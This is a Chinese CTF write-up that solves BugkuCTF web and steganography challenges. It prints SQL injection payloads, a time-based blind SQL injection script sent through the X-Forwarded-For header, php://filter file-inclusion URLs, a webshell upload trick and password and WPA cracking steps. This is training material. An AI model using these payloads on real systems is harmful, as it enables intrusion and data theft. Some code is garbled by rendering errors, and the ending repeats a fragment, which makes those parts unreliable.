旧BugkuCTF—部分wp

BugkuCTF——wp

Web篇

0x001—web2

解题思路:

1、直接按F12即可找到

0x002—计算器

解题思路:

1、按下F12发现它对输入框的长度进行了限制,先将长度调大

2、在计算给出的题点击验证即可。

0x003—web基础 $_GET

解题思路:

1、提交数据方式为GET传参,所以直接what=flag即可

参考playload:http://123.206.87.240:8002/get/?what=flag

旧BugkuCTF—部分wp_第1张图片

0x004—web基础 $_POST

解题思路:

1、此题是POST传参,来提交数据的所以我们利用Hackbar传参即可得到Flag

旧BugkuCTF—部分wp_第2张图片

0x005—矛盾

解题思路:

1、读代码发现判断num是否为数字1,不是则输出数字1,这样看起来是自相矛盾的所以我们可以让一个是1但不一定是纯数字型的1。

请参考playload:http://123.206.87.240:8002/get/index1.php?num=1a.5616

旧BugkuCTF—部分wp_第3张图片

0x006—web3

解题思路:

1、点击进去后出来弹窗,按F12后进入到Sources中进入首页发现有许多的JS,但最后有一串很特殊的字符,通过Unicode解码发现Flag。

2、或者直接将此特殊字符复制到新建对话框中,浏览器自动解析出Flag。

旧BugkuCTF—部分wp_第4张图片

0x007—域名解析

解题思路:

1、这题刚开始打开是没啥头绪的,查看了一些资料和相关的题目后进行尝试,最后发现在Windows中找到C:\Windows\System32\drivers\etc\hosts在利用TXT打开它,在后面增加一条123.206.87.240 flag.baidu.com保存即可。

2、在打开浏览器访问flag.baidu.com即可得到Flag。

旧BugkuCTF—部分wp_第5张图片

0x008—你必须让他停下

解题思路:

1、通过抓包,抓取数据包,在到Repeater中进行查找Flag,点击Go,将网页格式改为HTML方便查看Flag,最终查到Flag。

旧BugkuCTF—部分wp_第6张图片

0x009—本地包含

解题思路:

网页打开后没有任何显示

0x010—变量1

解题思路:

1、首先代码审计

error_reporting(0); ( 代表关闭报错提示 )
include “flag1.php”;( 包含文件 flag1.php )
highlight_file(file);( 对文件进行语法高亮显示 )
if(isset($_GET[‘args’])){ ( 条件判断 get方法传递的args参数是否存在存在为真 )
$args = $_GET[‘args’];( 赋值给变量 KaTeX parse error: Undefined control sequence: \w at position 32: …!preg_match("/^\̲w̲+/",$args)){( 正则表达式判断 ) if条件判断 KaTeX parse error: Expected 'EOF', got '}' at position 79: …error! )** **}̲** **eval("va…$args);");( eval()函数 将字符串作为php代码执行结尾加分号 )

}

0x011—web5

解题思路:

1、首先查看了下源代码,发现有一大串特殊的符号,利用在线解码器发现没有任何用,于是放在了控制台中回车出现了Flag。

旧BugkuCTF—部分wp_第7张图片

0x012—头等舱

解题思路:

1、打开网页发现真的什么都没有,检查源码发现有个id为wordTrans2008342469所以可以推断出,这个网页还是有东西的。

2、利用抓包软件抓包,发现在数据头中真的有点东西,即得到Flag。

旧BugkuCTF—部分wp_第8张图片

0x013—网站被黑

解题思路:

1、首先查看源代码,发现没有任何有关信息,我们用御剑进行后台扫描,发现了一个shell.php的网站,打开它发现需要密码。

2、利用抓包,进行暴力破解,这个过程需要很长的时间,最后发现有个长度不一样的,那个就是后门密码。

3、在得到的shell网站中输入后门密码得到Flag。

旧BugkuCTF—部分wp_第9张图片

0x014—管理员系统

解题思路:

1、打开网站后发现是一个登录界面,我们按F12发现一串特殊的代码,我们利用HackBar中的Base64解码得到 test123 于是猜测这个有可能是密码,进行尝试显示的是 IP禁止访问,请联系本地管理员登陆,IP已被记录. 本地管理员,意思是需要通过本地管理员才可以,查询了一下发现X-Forwarded-For东西, 代表客户端,作用是获得HTTP请求端真实的IP。

2、我们伪造一个请求头,在发送得到Flag。

0x015—web4

解题思路:

1、进入网页首先看到他让我们查看源代码,按F12进行查看,发现在JS中有个很特别的字符串,我们尝试用URL进行解码,发现了他的源代码,进行审计发现他让我们将p1中if里的字符串与p2和p2之前的字符串进行结合,结合后将得到的字符串输入到对话框中,得到Flag。

旧BugkuCTF—部分wp_第10张图片

旧BugkuCTF—部分wp_第11张图片

0x016—flag在index里

解题思路:

1、进入网站后,发现只有个A链接,点后发现跳转后的网页里没有任何的异常之处,审题目发现Flag在首页中,我们构造playload,http://123.206.87.240:8005/post/index.php?file=index.php发现进入的首页是空白的,此时想到有可能是加密的网页。

2、对网页进行Base64解密http://123.206.87.240:8005/post/index.php?file=php://filter/convert.base64-encode/resource=index.php成功进入首页后发现了一串代码,利用Base64解码得到源码,发现Flag就在源码中。

旧BugkuCTF—部分wp_第12张图片

0x017—输入密码查看flag

解题思路:

1、打开首页发现是一个五位数纯数字密码,利用BurpsuiteUnlimited进行暴力破解,破解过程有点漫长,最终得到密码13579

2、输入密码,得到Flag

1597293832943

旧BugkuCTF—部分wp_第13张图片

0x018—备份是个好习惯

解题思路:

1、打开网页发现有一串字母,对它进行各种解密发现没啥用,仔细看发现他是一个相同的字符串组合在一起的,题目让我们养成备份的好习惯,那我们就找下有没有.bak后缀的备份文件,发现在网页中是找不到的。

2、所以利用御剑去扫描他的后台,发现了一个http://123.206.87.240:8002/web16/index.php.bak的网址,打开它后下载下来,用记事本打开发现里面有个很像Flag的东西,代码审计发现使用MD5进行加密的。

3、我们尝试绕过, parse_str()函数,它的作用是将字符串解析到变量中

4、构造playloadkkeyey1[]=1&kkeyey2[]=2,之后会发现Flag。

请参考playload:http://123.206.87.240:8002/web16/?kkeyey1[]=a&kkeyey2[]=b

旧BugkuCTF—部分wp_第14张图片

0x019—成绩单

解题思路:

1、这道题是典型的注入题。

(1)首先输入1

旧BugkuCTF—部分wp_第15张图片

再输入2

旧BugkuCTF—部分wp_第16张图片

再输入3

旧BugkuCTF—部分wp_第17张图片

再输入4

1597296288857

由此说明有三个字段

(2)尝试手动注入

输入1’ 报错

1597296288857

输入1‘–+ 报错

1597296288857

输入1’# 无报错

旧BugkuCTF—部分wp_第18张图片

输入1’+ 报错

1597296288857

说明±- 都被过滤掉了

(3)尝试看数据库有几列

1 2 3 4所对应的是 姓名 Math English Chinese

利用 Order By 查看有几列

1’ order by 4# 回显正常

旧BugkuCTF—部分wp_第19张图片

1‘order by 5# 回显异常

1597297285672

所以可以确定有四列

(4)接下来开始 爆库 爆表 爆字段

构造id=-1’ union select 1,2,3,4# 回显正常

旧BugkuCTF—部分wp_第20张图片

查看数据库名称

构造 id=-1’ union select 1,2,3,database()# 回显正常

旧BugkuCTF—部分wp_第21张图片

查看表名

id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 回显正常

旧BugkuCTF—部分wp_第22张图片

爆字段名

id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

这里需要用到16进制的编码来绕过,Flag是敏感信息有可能会被过滤掉,为了稳妥直接利用16进制绕过。

经过验证Flag被过滤掉了

playload:id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=fl4g.sc# 回显异常

旧BugkuCTF—部分wp_第23张图片

最后查询数据

playload: id=-1’ union select 1,2,3,skctf_flag from fl4g#

旧BugkuCTF—部分wp_第24张图片

0x020—cookies欺骗

解题思路:

1、打开首页发现有一串很长的字符串,进行解密,发现没啥用,注意到了URL中的filename=a2V5cy50eHQ=filename后面的看起来有点古怪,利用base64进行解码,发现是 keys.txt 。尝试filename后面访问首页index.php,这里利用base64对index.php进行编码,发现没有啥变化,重新审URL发现里面有个line行数。

2、在行数后面添加数字,发现出现代码,怀疑有可能是源码,通过一行一行的审计,发现必须满足if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ margin=margin 才可以访问 key.php,再将key.php进行base64编码。

3、执行后是空白的,检查源代码,发现Flag。

方法二、

之前的方法跟步骤1 2 一样,但在解码后的步骤有些不一样,利用BurpUnlimited抓包,再将Cookie改为Cookie:margin=margin,GO即可得到Flag。

1597303459385

0x021—never give up

解题思路:

1、代开网站后查看源代码发现没啥特别的,再看URL,发现在URL中有个id=1的东西,再看源代码中也有一个和他很像的字符,将源代码中的字符放到id=的后面执行,发现没有啥用.

playload:view-source:http://123.206.87.240:8006/test/hello.php?id=1p.html

再将hello.php与id=删除,执行后面的1p.html网页,发现网页跳转了,尝试查看源代码,发现是bugku的网站,想办法让它不跳转网页,在之前playload的网页中直接查看源代码,在源代码的URL中进行执行,网页未跳转但发现了一串字符串,尝试用URL进行解码,再用base64进行解码,在用URL进行解码,得到源代码,审计后发现只需要访问 f4l2a3g.txt 即可得到Flag。

注:只需要制框内的代码进行解密即可。

旧BugkuCTF—部分wp_第25张图片

解码顺序:URL==》base64==》URL

参考playload:view-source:http://123.206.87.240:8006/test/f4l2a3g.txt

旧BugkuCTF—部分wp_第26张图片

0x022—字符?正则?

解题思路:

1、这是一道正则题,打开首页发现他直接把源代码给你了。

2、尝试审计

旧BugkuCTF—部分wp_第27张图片

(1) /代表匹配的开始与结束两个/里面的内容就是要匹配的内容

**(2) .代表数字匹配任意数字,代表匹配0-n次两者结合.就是匹配任一个数字任意次

(3) {4,7}表示匹配前一个字符4到7次

(4) \表示要找\后面的内容,/./就是找/数字/

(5) [a-z]就是匹配a-z之间的字符

(6) [[:punct:]]代表任意标点

(7) i代表字体大小

正则表达字符含义:https://www.cnblogs.com/afarmer/archive/2011/08/29/2158860.html

请参考playload:key2key2222key:/2/2keya.

1597307040549

0x023—你从哪里来

解题思路:

1、首先观察打开的页面,发现没有任何特别的地方,查看源码 无果。

2、抓包没有任何的特别,判断需要在这里添加一个请求头部。

3、伪造一个头部,去请求 google 。

注:referer 表示一个来源。

参考playload:referer: https://www.google.com

0x024—md5 collision(NUPT_CTF)

解题思路:

1、首先进入首页,发现有行英文意思为请输入一个。查看源代码 无果

2、尝试用BP抓包 无果

3、在解读题目

md5碰撞

发现需利用 0E开头的字符串进行绕过。

其原理为:在PHP中处理哈希字符串时会利用”!= & ”==”对哈希值进行比较它把每一个以”0E”开头的哈希值都 解释为0,以如果两个不同的密码经过哈希以后,哈希值都是以”0E”开头的,么PHP将会认为他们相同,都是0。

本题原理为利用 0E 字符串,如果在数据库中有哈希值 0E 开头的密码就可以,以这个用户的身份登陆进去。

尽管没有正真的密码。

4、尝试在URL里进行绕过。

参考playload:http://123.206.87.240:9009/md5.php?a=s1836677006a

注:a此后的0E值是可以改变的。

部分哈希值:

0e开头的md5和原值:
 
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020

0x025—程序员本地网站

解题思路:

1、打开网站 查看源码 无果

2、利用BP抓包,任何发现 题目说本地网站,意思是要从本地去访问

3、构造请求头X-Forwarded-For:127.0.0.1继续访问得到Flag

参考playload:X-Forwarded-For: 127.0.0.1

旧BugkuCTF—部分wp_第28张图片

X-Forwarded-For: 简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,只有在通过了HTTP 代理或者负载 均衡服务器时才会添加该项。

0x026—各种绕过

解题思路:

1、打开网页发现源码

2、源码审计


id、uname通过get方法传值,passwd通过post方法传值且如果想要进入内层循环必须传入uname和passwd
uname和passwd弱类型不相等
uname和passwd加密后的值强相等
id字段url解码后=‘margin’

只要使uname的sha1的值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等 ,这里就得需要

sha1函数无法处理数组的特性, 当对sha1()函数传入数组时会返回null,由此,只需要传入两个不同的数组即可成功 绕过。 得到Flag

构造payload:http://123.206.87.240:8002/web7/?uname[]=1&id=margin 在post data 中passwd[]=2

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IFU8LoBm-1608735278117)(E:\1-信息安全暑期培训\CTF自学\Bagku\BugkuCTF—wp.assets\1598082656479.png)]

0x027—web8

解题思路:

1、打开首页发现源码,源码审计

This is flag:" ." $flag

"; } else { echo "

sorry!

"; } } ?>

extract() -使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应 的一个变量.

empty()-判断一个变量是否被认为是空的。当一个变量并不存在,或者它的值等同于FALSE,那么它会被认为不存 在。如果变量不存在的话,empty()并不会产生警告。

trim()-移除字符串两侧的空白字符或其他预定义字符。

file_get_contents-将整个文件读入一个字符串

2、分析得到

(1)可能有txt文件

(2)尝试发现:含有flag.txt文件,打开后有个Flags

playload:http://123.206.87.240:8002/web8/flag.txt

旧BugkuCTF—部分wp_第29张图片

3、构造playload:http://123.206.87.240:8002/web8/?ac=flags&fn=flag.txt

旧BugkuCTF—部分wp_第30张图片

0x028—细心

解题思路:

1、打开网站后发现是一个模拟404的网站,刚开始还有点信。查看源码发现了两个链接。点击无果

2、利用BP抓包,发现没有任何信息。

3、利用御剑扫描一下后台,发现了一个http://123.206.87.240:8002/web13/robots.txtURL

(1)打开这个网站后

(2)发现只有

User-agent:

Disallow: /resusl.php

(3)将resusl.php放到/web13/的后面尝试访问

(4)发现进入了 旧BugkuCTF—部分wp_第31张图片

还有一行PHP代码

(5)刚进入网页时,题目提醒 想办法变成admin ,所以尝试GET传参 x=admin 得到Flag

4、参考playload:http://123.206.87.240:8002/web13/resusl.php?x=admin

旧BugkuCTF—部分wp_第32张图片

0x029—求getshell

解题思路: 考点:后缀名黑名单检测和类型检测

1、打开网页查看源代码 无果

2、打开BP抓包,我们上传的是一句话图片木马,刚开始想他让我们上传图片那图片类型不用更改,图片后缀不用更 改。

3、最后做出来发现图片后缀可以添加也可以更改但必须是“.php5”的后缀。这里是经过许多的尝试才得到的。

旧BugkuCTF—部分wp_第33张图片

旧BugkuCTF—部分wp_第34张图片

4、最后得到Flag

旧BugkuCTF—部分wp_第35张图片

0x030—INSERT INTO注入

解题思路:

1、打开题目发现他把源码直接放在了题目中

接下来代码审计

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

发现,在10行的时候$ip被截取了

.explode函数的作用是按规则拆分为数组.例如:explode(" ",$str)

明确注入点是HTTP头,尝试利用 x-forwarded-for 来进行注入,但过程中发现逗号被过滤了。

在mysql中与if具有相同效果的是:

select case when (条件) then 代码1 else 代码 2 end;

而且由于逗号,被过滤,我们就不能使用substr、substring了,但我们可以使用:from 1 for 1

参考playload:

127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a'then sleep(5) else 0 end))--+

利用python脚本:

# -*- coding:utf-8 -*-
import requests
import sys
# 基于时间的盲注,过滤了逗号 ,
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://120.24.86.145:8002/web15/'
flag = ''
for i in range(1, 40):
    print('正在猜测:', str(i))
    for ch in range(32, 129):
        if ch == 128:
            sys.exit(0)
        sqli = sql.format(i, chr(ch))
        # print(sqli)
        header = {
     
            'X-Forwarded-For': sqli
        }
        try:
            html = requests.get(url, headers=header, timeout=3)
        except:
            flag += chr(ch)
            print(flag)
            break

得到Flag:

flag{cdbf14c9551d5be5612f7bb5d2867853}

0x031—flag.php

解题思路:

1、

2、

0x032—

解题思路:

0x033—

解题思路:

0x034—

解题思路:

0x035—

解题思路:

0x036—

解题思路:

杂项

0x001 telnet ⭐

解题思路:

1、下载压缩包,解压,发现里面有一个流量包,用wireshark打开该流量包

2、右键追踪即可得到flag

旧BugkuCTF—部分wp_第36张图片

0x002 眼见非实(ISCCCTF) ⭐

解题思路:

1、首先把压缩包下载下来,发现没有前缀

2、尝试给他添加一个前缀名1.zip

3、发现可以运行,打开他有一个doxc文件,尝试打开发现提示打开错误

4、我们再将这个的后缀该为压缩文件.zip

5、发现可以运行并打开他

6、里面有一大堆的.xml为后缀的文件,利用记事本打开去查询flag

7、最后在众多文件中找到了flag,他就藏在文件中

旧BugkuCTF—部分wp_第37张图片

技巧

  1. 这里利用一个小技巧,用记事本打开后按住ctrl+F可以快速调出查询命令,在里面输入flag进行查询快捷些。

0x003 猜 ⭐

解题思路:

1、打开网站是一张图片,有一个女人的半张脸

2、这道题给的提示就是让我们猜这个人的名字,虽然是个明星但本人不认识。

3、打开百度识图发现是刘亦菲

旧BugkuCTF—部分wp_第38张图片

0x004 宽带信息泄露 ⭐⭐

解题思路:

1、将bin文件下载下来

2、百度查阅了下打开bin文的软件,在windows下是 RouterPassView 软件查看配置文件

3、将bin文件用它打开,利用快捷键进行查找宽带的用户名` ctrl+F 查看 username 即可得到flag

旧BugkuCTF—部分wp_第39张图片

RouterPassView下载地址: http://99idc.jb51.net:81/201206/tools/routerpassview_jb51net.rar

RouterPassView:RouterPassView – 路由密码查看

RouterPassView是 NirSoft 出品的一款路由密码恢复软件,可以查看绝大多数家用路由的配置文件中保存的密码,使用时只需要RouterPassView 打开导出的路由配置文件即可。

0x005 多种方法解决 ⭐

解题思路:

1、打开题目将压缩包下载下来

2、解压后尝试打开.exe文件发现打不开

3、题目提示说做题过程中有可能会出现二维码,将解压后的文件放到文本里发现有可能是base64编码,百度搜索base64转图片,将字符串放入转化得到二维码,扫描二维码得到flag

旧BugkuCTF—部分wp_第40张图片

0x006 闪的好快 ⭐

解题思路:

1、打开题目发现是一个二维码动图,利用Stegsolve对gif进行浏览每一帧

2、用手机去扫码一个一个扫得到flag

旧BugkuCTF—部分wp_第41张图片

注:下划线扫码得到的是一个刚,记得改为下划线

stegsolve下载地址:http://www.caesum.com/handbook/Stegsolve.jar

stegsolve安装配置:配置好Java环境变量

stegsolve功能简介: https://www.cnblogs.com/dzkwwj/p/9473357.html

0x007 白哥的鸽子 ⭐

解题思路:

1、打开题目下载文件,添加后缀.jpg显示图片

2、打开图片只有一个鸽子的图案

旧BugkuCTF—部分wp_第42张图片

3、尝试将图片方进文本文档,查找Flag无果

4、再利用WinHex进行查看发现最后一行有个很特别的

一串字符

旧BugkuCTF—部分wp_第43张图片

5、经过一些查找发先这是一个 栅栏密码 ,将他进行栅栏解密

6、解密过程中他会有选择每组字数的初始为2

2 : f3g_2oi@vaywo_}_lr{c2ls@

3 : flag{w22_is_v3ry_cool}@@

4 : fo3_g}__2lori{@cv2alysw@

5 : fy2@rgosac2}3wlil__@v{o_

6 : fvl3argy{ wc2o2o_li}s@@

尝试到六已经出来了,每组字数为三即可得到Flag

注:栅栏密码——密码学—加密学

加密原理详解参考:https://baike.baidu.com/item/%E6%A0%85%E6%A0%8F%E5%AF%86%E7%A0%81/228209?fr=aladdin

所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话。 不过栅栏密码本身有一个潜规则,就是组成栅栏的字母一般不会太多。(一般不超过30个,也就是一、两句话)

0x008 隐写 ⭐

解题思路:

1、将图片放到Win Hex里更改长度让他成为一个正方形

2、得到flag

旧BugkuCTF—部分wp_第44张图片

0x009 啊哒 ⭐

解题思路:

1、将图片放到Win Hex里发现有隐藏文件

2、用kali的binwalk将文件分离

3、有个压缩包,里面的文件有密码,刚开始使用fcrackzip发现无果

4、在windos下发现刚开始的图片属性里有个16进制的编码,解码得到压缩包密码

5、即可得到flag

旧BugkuCTF—部分wp_第45张图片

0x010 又一张图片,还单纯吗 ⭐

解题思路:

1、现右击查看属性无果

2、放进Win Hex里查看无果

3、放进kali里用binwalk查看有文件存在

4、刚开始利用binwalk -e进行分离发现没有用

5、百度发现有一个命令 foremost 可以将图片中的文件分离

6、即可得到flag

注: foremost用法

foremost [-v|-V|-h|-T|-Q|-q|-a|-w-d] [-t ] [-s ] [-k ] [-b ] [-c ] [-o ] [-i 

或 foremost + 文件名

0x011 隐写2 ⭐

解题思路:

1、将图片放进kali里利用binwalk分离

2、发现是个加密压缩包利用windos的rar暴力破解软件破解得到密码

3、打开有张图,利用txt打开他搜索f在最后一行

4、是个base64加密答案,解密得到flag但提交格式为f1@g{y0u Are a h@cker!},尝试了很久才发现心累。

0x012 come_game ⭐⭐⭐

解题思路:

1、点击游戏现玩下,退出后发现有了文件

2、将为文件尝试放进WinHex里去解读

3、发现有个位置是控制关卡的将他改为5,重新打开游戏即可得到flag

1601568413842

0x013 linux ⭐

解题思路:

方法一、

1、解压后有个无后缀的文件

2、放进kali里用strings来查看内容,发现flag、

注:strings的用法

strings [ -a ] [ - ] [ -o ] [ -t Format ] [ -n Number ] [ -Number ] [ file ... ]

`-a --all:扫描整个文件而不是只扫描目标文件初始化和装载段
-f –print-file-name:在显示字符串前先显示文件名
-n –bytes=[number]:找到并且输出所有NUL终止符序列

  • :设置显示的最少的字符数,默认是4个字符
    -t --radix={o,d,x} :输出字符的位置,基于八进制,十进制或者十六进制
    -o :类似–radix=o
    -T --target= :指定二进制文件格式
    -e --encoding={s,S,b,l,B,L} :选择字符大小和排列顺序:s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit
    @ :读取中选项`

方法二、

解压直接用记事本打开搜索key得到flag

方法三、

在kali里用cat flag得到flag,flag就在最后面

0x014 隐写3 ⭐

解题思路:

1、将图片放到Win Hex里更改高度得到flag

0x015 做个游戏(08067CTF) ⭐⭐

解题思路:

1、打开游戏是个不可能过关的游戏,将窗口放大发现小方块可以到空白的地方躲避小绿帽子

2、结果没用,放进kali里利用binwalk查看,有隐藏文件,-e分离

3、尝试用grep指令进行查看内容,指令为grep -i “查找的字符” 文件名

4、得到flag的base64加密,解密得到flag

注:grep的用法https://www.cnblogs.com/lemon-feng/p/11249461.html

grep -i “test” test.txt 搜索出含有“test” 字符串(-i:不区分大小)

img

grep -i -n “test” test.txt 搜索出含有“test” 字符串(-i:不区分大小),并打印行号

img

grep -i -n --color “test” test.txt 搜索出含有“test” 字符串(-i:不区分大小),并打印行号,关键字“test”颜色标记(centos7系统默认为grep命令配置了别名,所以不使用—color也能显示颜色)

img

grep -I -c “test” test.txt,打印“test”字符串(不区分大小写)显示的次数

img

grep -I -o “test” test.txt,打印“test”字符串(不区分大小写),但不打印整行

img

grep -A1 “18” test2.txt,打印“18”字符串和它上一行的信息

img

grep -B1 “18” test2.txt,打印“18”字符串和它下一行的信息

旧BugkuCTF—部分wp_第46张图片

grep -C1 “18” test2.txt,打印“18”字符串和它上一行和下一行的信息

img

grep -w “dlf” test.txt,精确匹配出“dlf”字符串的

旧BugkuCTF—部分wp_第47张图片

grep -v “dlf” test.txt,匹配出不包含“dlf”字符串的行

img

grep -e ‘abc’ -e ‘dlf’ test.txt,同时匹配”abc”和”test”字符串

旧BugkuCTF—部分wp_第48张图片

grep -q 静默模式

静默模式下grep不会输入任何信息,无论是否匹配到指定的字符串,都不会输出任何信息,所以配合使用“echo %?”命令,查看命令的执行状态,如果返回值0,证明上一条grep命令匹配到了指定的字符串,如果返回值1,则证明上一条grep命令没有匹配到指定的字符串。

旧BugkuCTF—部分wp_第49张图片

0x016 想蹭网先解开密码 ⭐⭐⭐⭐

解题思路:

1、打开流量包查看, WIFI连接认证的重点在WPA的四次握手包,也就是eapol协议的包,过滤一下

2、在kali里生成字典, 使用crunch生成密码字典 旧BugkuCTF—部分wp_第50张图片

3、 利用aircrack 进行爆破 旧BugkuCTF—部分wp_第51张图片

4、得到flag

0x017 Linux2 ⭐

解题思路:

1、将文件用kali的binwalk扫描一下发现有文件

2、用改命令工具分离,发现文件太多

3、用grep命令搜索KEY得到flag

0x018 细心的大象 ⭐

解题思路:

1、将图片放进kali里查看有隐藏文件,分离

2、得到rar压缩包有密码尝试Windows下爆破无果

3、发现图像的属性里有一串base64加密字符串解密得到密码

4、将解密得到的图片放近Win Hex里更改高度,得到flag

0x019 爆照(08067CTF) ⭐⭐

解题思路:

1、将图片放进kali里分离隐藏文件

2、得到一个很奇怪的文件,里面全是数字8组成的文件无后缀

3、还有一个gif的动图,查看为无果

4、在88文件中 有个二维码扫描获得bilibili

5、在8888文件中隐藏了 一个二维码扫码获得panama

6、在888文件属性中发现有个base64加密字符串解密得到一部分flag

7、将之前得到的答案按顺序组合起来得到完整的flag` flag{bilibili_silisili_panama}

0x020 猫片(安恒) 难⭐⭐⭐⭐

解题思路:

1、放到stegsolve里查看,在Data Extract里发现有个图片但文件头被添加了其他东西

旧BugkuCTF—部分wp_第52张图片

2、将他保存为图片到Win Hex里删除头部添加的东西得到一半的二维码,在更改长度

3、得到完整的二维码,扫描得到一个网站,发现是百度云盘,将为文件下载下来

4、解压发现解压失败,当时以为是伪加密

5、结果是利用NTFS交换数据流隐藏文件

6、去网上查找资料得到相应的软件,利用它得到了一个.py的文件

7、 直接丢到这。。https://tool.lu/pyc/

旧BugkuCTF—部分wp_第53张图片

8、反编译放到python里跑下得到flag

旧BugkuCTF—部分wp_第54张图片

注:推荐一个网站比较方便https://tool.lu/coderunner/

0x021 多彩⭐⭐⭐⭐

解题思路:

1、将图片放到Win Hex里无果

2、放到stegsolve里发现有个YSL字样

3、尝试用 Data Extract发现有个zip的包保存为zip发现文件需要密码

4、看见之前的 YSL字样百度发现是个口红的牌子

5、将给的图片利用吸管工具将16进制的颜色全部转化为2进制在转为字符

6、得到密码白学家即可得到flag

0x022 旋转跳跃⭐ (工具有点偏)

解题思路:

1、利用MP3StegoDecode工具

2、命令如下

旧BugkuCTF—部分wp_第55张图片

1)第一个是工具名 2)第二个是-X是获取隐藏的东西 3)第三个-P后面写密码 4)第四个是密码 5)第五个是要解密的音频

0x023 普通的二维码⭐⭐

解题思路:

1、放进Win Hex里 发现尾部有一串数字

2、发现都是已1开头的,百度后发现是8进制数

3、写脚本将他变为8进制数并且转为 ascii 码得到flag

str = '146154141147173110141166145137171060125137120171137163143162151160164137117164143137124157137124145156137101163143151151041175'
flag = ''
a = int(len(str)/3)
for i in range(a):
    flag += chr(int(str[i*3:i*3+3],8))
print(flag)

0x024 乌云邀请码⭐

解题思路:

1、放进stegsolve里尝试用 Data Extract打开

2、发现 flag

0x025 神秘的文件⭐⭐⭐ 工具有问题

解题思路:

1、将压缩包解压得到一个压缩包和图片

2、猜测有可能是明文攻击

3、 如下图所示:得到密码 q1w2e3r4

flag.zip作为密文压缩包
logo.zip作为明文压缩包
攻击类型:明文攻击

旧BugkuCTF—部分wp_第56张图片

4、将flag.zip解压得到的word文件放进kali里分离出个文件在里面找flag

5、得到一个base64加密的文件,解密得到flag

0x026 论剑⭐⭐⭐⭐

考点

  • JPG图片宽高尺寸的更改位置FFC2
  • 文件标识头7z:37 7A BC AF 27 1C
  • 在kali中部分数据提取命令dd

解题思路:

1、用010打开图片,发现是由两张图片组成的,在两张图片的头尾交接处发现有一串二进制的数,尝试将他转为Ascii码得到一串字符mynameiskey!!!hhh

2、到这里思路断了,尝试去改高度,百度后发现JPG的高度是在16进制FFC2处再往后三个字节就是图片大小尺寸

普通的JPG的图片大小尺寸都在FFC2后三个字节处开始,总共就两个字节

旧BugkuCTF—部分wp_第57张图片

3、发现新大陆,有flag但有一部分被隐藏了,放到kali里binwalk下出来两张图,改下大小发现跟原来的一样flag有几个打了马赛克,在到两张图里去看看有没有隐藏信息,发现在FFD9图片结束尾部特征,二进制编码后面发现有个像 7z的文件标识头的东西,尝试去修复文件标识头改为37 7A BC AF 27 1C保存再到kali里去

旧BugkuCTF—部分wp_第58张图片

4、将这一段数据提取出来并保存为压缩包的格式命令为dd if=lunjian.jpg of=1.zip skip=9591 bs=1得到压缩包解压,再将图片更改高度发现与之前的flag遮挡有错位,组合得到flag

旧BugkuCTF—部分wp_第59张图片

kali里dd命令使用方法

使用dd命令分离文件,如:
dd if=hehe.jpg of=hehe1.zip bs=1 skip=54163
if=file(源文件)
of=file(输出文件)
bs=bytes(一次性转换bytes个字节,及转换缓冲区大小)
skip=blocks(输入文件开头跳过blocks个块再开始复制--通俗点讲就是从哪开始)

常见文件头标识

常见的文件头:
7z
文件头标识:37 7A BC AF 27 1C
JPEG/JPG
文件头标识: ff, d8 (SOI) (JPEG 文件标识) 
文件结束标识: ff, d9 (EOI) 
PNG
文件头标识:89 50 4E 47 0D 0A 1A 0A
GIF
文件头标识:47 49 46 38 39(37) 61 GIF89(7)a
BMP
文件头标识:42 4D--- BM
HTML (html)
文件头标识:68746D6C3E 
ZIP Archive (zip)
文件头标识:504B0304  PK
RAR Archive (rar)
文件头标识:52617221 
等等..

0x027 图穷匕见⭐

考点

rd文件放进kali里分离出个文件在里面找flag**

5、得到一个base64加密的文件,解密得到flag

0x026 论剑⭐⭐⭐⭐

考点

  • JPG图片宽高尺寸的更改位置FFC2
  • 文件标识头7z:37 7A BC AF 27 1C
  • 在kali中部分数据提取命令dd

解题思路:

